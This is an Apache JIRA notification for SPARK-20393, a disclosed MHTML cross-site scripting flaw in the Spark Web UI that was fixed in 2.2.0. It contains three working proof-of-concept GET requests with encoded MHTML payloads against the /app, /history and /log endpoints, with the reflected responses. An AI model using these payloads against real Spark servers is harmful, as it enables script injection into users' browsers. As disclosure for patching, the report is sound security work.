[ https://issues.apache.org/jira/browse/SPARK-20393?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Sean Owen updated SPARK-20393: ------------------------------ Fix Version/s: (was: 2.3.0) 2.2.0 > Strengthen Spark to prevent XSS vulnerabilities > ----------------------------------------------- > > Key: SPARK-20393 > URL: https://issues.apache.org/jira/browse/SPARK-20393 > Project: Spark > Issue Type: Bug > Components: Web UI > Affects Versions: 1.5.2, 2.0.2, 2.1.0 > Reporter: Nicholas Marion > Assignee: Nicholas Marion > Priority: Minor > Labels: security > Fix For: 2.2.0 > > > Using IBM Security AppScan Standard, we discovered several easy to recreate > MHTML cross site scripting vulnerabilities in the Apache Spark Web GUI > application and these vulnerabilities were found to exist in Spark version > 1.5.2 and 2.0.2, the two levels we initially tested. Cross-site scripting > attack is not really an attack on the Spark server as much as an attack on > the end user, taking advantage of their trust in the Spark server to get them > to click on a URL like the ones in the examples below. So whether the user > could or could not change lots of stuff on the Spark server is not the key > point. It is an attack on the user themselves. If they click the link the > script could run in their browser and comprise their device. Once the > browser is compromised it could submit Spark requests but it also might not. > https://blogs.technet.microsoft.com/srd/2011/01/28/more-information-about-the-mhtml-script-injection-vulnerability/ > {quote} > Request: GET > /app/?appId=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a-- > _AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer- > Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a > HTTP/1.1 > Excerpt from response: <div class="row-fluid">No running application with ID > Content-Type: multipart/related; > boundary=_AppScan > --_AppScan > Content-Location:foo > Content-Transfer-Encoding:base64 > PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+ > </div> > Result: In the above payload the BASE64 data decodes as: > <html><script>alert("XSS")</script></html> > Request: GET > /history/app-20161012202114-0038/stages/stage?id=1&attempt=0&task.sort=Content- > Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent- > Location:foo%0d%0aContent-Transfer- > Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&tas > k.pageSize=100 HTTP/1.1 > Excerpt from response: Content-Type: multipart/related; > boundary=_AppScan > --_AppScan > Content-Location:foo > Content-Transfer-Encoding:base64 > PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+ > Result: In the above payload the BASE64 data decodes as: > <html><script>alert("XSS")</script></html> > Request: GET /log?appId=app-20170113131903-0000&executorId=0&logType=Content- > Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent- > Location:foo%0d%0aContent-Transfer- > Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&byt > eLength=0 HTTP/1.1 > Excerpt from response: ==== Bytes 0-0 of 0 of > /u/nmarion/Spark_2.0.2.0/Spark-DK/work/app-20170113131903-0000/0/Content- > Type: multipart/related; boundary=_AppScan > --_AppScan > Content-Location:foo > Content-Transfer-Encoding:base64 > PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+ > Result: In the above payload the BASE64 data decodes as: > <html><script>alert("XSS")</script></html> > {quote} > security@apache was notified and recommended a PR. -- This message was sent by Atlassian JIRA (v6.3.15#6346) --------------------------------------------------------------------- To unsubscribe, e-mail: issues-unsubscr...@spark.apache.org For additional commands, e-mail: issues-h...@spark.apache.org